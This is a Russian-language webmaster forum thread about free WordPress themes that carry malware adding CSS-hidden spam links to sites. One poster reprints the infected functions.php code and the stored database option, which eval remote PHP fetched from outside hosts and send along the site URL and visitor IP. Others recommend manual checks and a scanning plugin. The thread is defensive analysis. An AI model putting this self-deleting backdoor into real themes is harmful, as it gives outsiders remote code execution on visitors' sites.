[voffka_m]

Собственно к чему я это решил спросить, я тут не давно столкнулся с такой бедой что в месте с темой на сайт прописывается зловред который потом добавляет скрытые ссылки на страницы сайта, вещь излечимая но все же не приятная.

Кто нибудь сталкивался с такой бедой?

[CuxpecT]

насколько я помню с чем-то подобным сталкивался 13-й
P.s. сам вп почти не использую, поэтому не смотрю

[itup]

Шаблон с офф. сайта или какого то варезника?

[lexxx]

Я, например, ВСЕ файлы шаблона проверяю перед установкой новой темы.
Во-первых, для проверки темы на "злой" код, во-вторых, для исправления ошибок автора темы.
А вообще, темы нужно проверять 100%. Очень много в инете зараженных тем.

[voffka_m]

itup, ну тема вроде позиционировалась как бесплатная. Как на в самом деле хз.

[vorons]

есть специальный плагин для проверки тем, как называется не помню (если найду, скину ссылку), проверяет на левые ссылки и остальное

[voffka_m]

В общем может кому пригодится, я тут немного по исследовал данный вопрос, во что получается.

Чаще всего зловред обитает в файле functions.php, а именно:

PHP код:

add_action('after_setup_theme', '_theme_setup');
function _theme_setup(){    
    $value = 'return eval(file_get_contents(\'http://wpru.ru/aksimet.php?id=\'.$post->ID.\'&m=46&n\'));';
    add_option('blogoption', $value, '', 'yes');
    //selfterminate
    $functions = file_get_contents(TEMPLATEPATH.'/functions.php');    
    $p1 = substr($functions, 0, strpos($functions, '//beginXX'));
    $p2 = end(explode('//endXX', $functions));
    file_put_contents(TEMPLATEPATH.'/functions.php', $p1.$p2);
}

add_filter('the_content', '_bloginfo', 10001);
function _bloginfo($content){
    global $post;
    if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
        return $co;
    } else return $content;
} 


После активации темы он видимо меняет это код на код следующего характера, так как на зараженных сайтах код что выше отсутствовал, за то был такой:

PHP код:

function wp_footer_() {
return @eval(get_option('blogoption'));
} 


Так же на зараженных сайтах если выполнить запрос к базе:

PHP код:

SELECT * FROM `wp_options` WHERE `option_name` = 'blogoption' 


Результат был такой:

PHP код:

global $post;return eval(file_get_contents('http://mytestlabs.com/wp5.php?ag='.strpos($_SERVER['HTTP_USER_AGENT'],'yahoo').'&p404='.is_404().'&p_id='.$post->ID.'&single='.(is_single()||is_page()).'&perm='.get_permalink().'&site='.$_SERVER['HTTP_HOST'].'&page='.$_SERVER['REQUEST_URI'].'&ip='.getenv('REMOTE_ADDR'))); 


Выводился эта беда в footer.php функцией wp_footer_(); как видно очень похожей на родную.

Весь этот зловред плодил на сайте скрытые ссылки, при просмотре их не было видно они скрывались с помощью css.

После удаления этого кода ссылки пропали.

---------- Сообщение добавлено 12:03 ---------- Предыдущее 12:01 ----------

vorons, а он проверяет до активации темы или уже непосредственно активированную тему на сайте?

---------- Сообщение добавлено 12:07 ---------- Предыдущее 12:03 ----------

lexxx, теперь я тоже :)

[vorons]

voffka_m,

а он проверяет до активации темы или уже непосредственно активированную тему на сайте?

насчетт этого честно незнаю, я его сам не проверял т.к. с wp не работаю

[Werdik]

я пользуюсь плагином TAC. Ссылка на wordpress.org

Плагин TAC ищет в коде шаблона зашифрованные внешние ссылки, которые оставляют создатели шаблонов для продвижения своих сайтов.

Установка плагина TAC. В админке блога находим раздел Плагины — нажимаем Добавить новый — и в открывшемся окне вводим в строку поиска его название: TAC.

Устанавливаем плагин TAC и активируем его. Для открытия страницы плагины найдите в разделе Внешний вид — нажмите TAC. Откроется страница на которой будут представлены результаты поиска закодированных ссылок в шаблоне по всем установленным темам на сайте

[donoway]

Я не проверял раньше. Но недавно, заметил в одном шаблоне wp скрытые ссылки, теперь смотрю. Будьте внимательны! :)

Werdik, спасибо за плагин!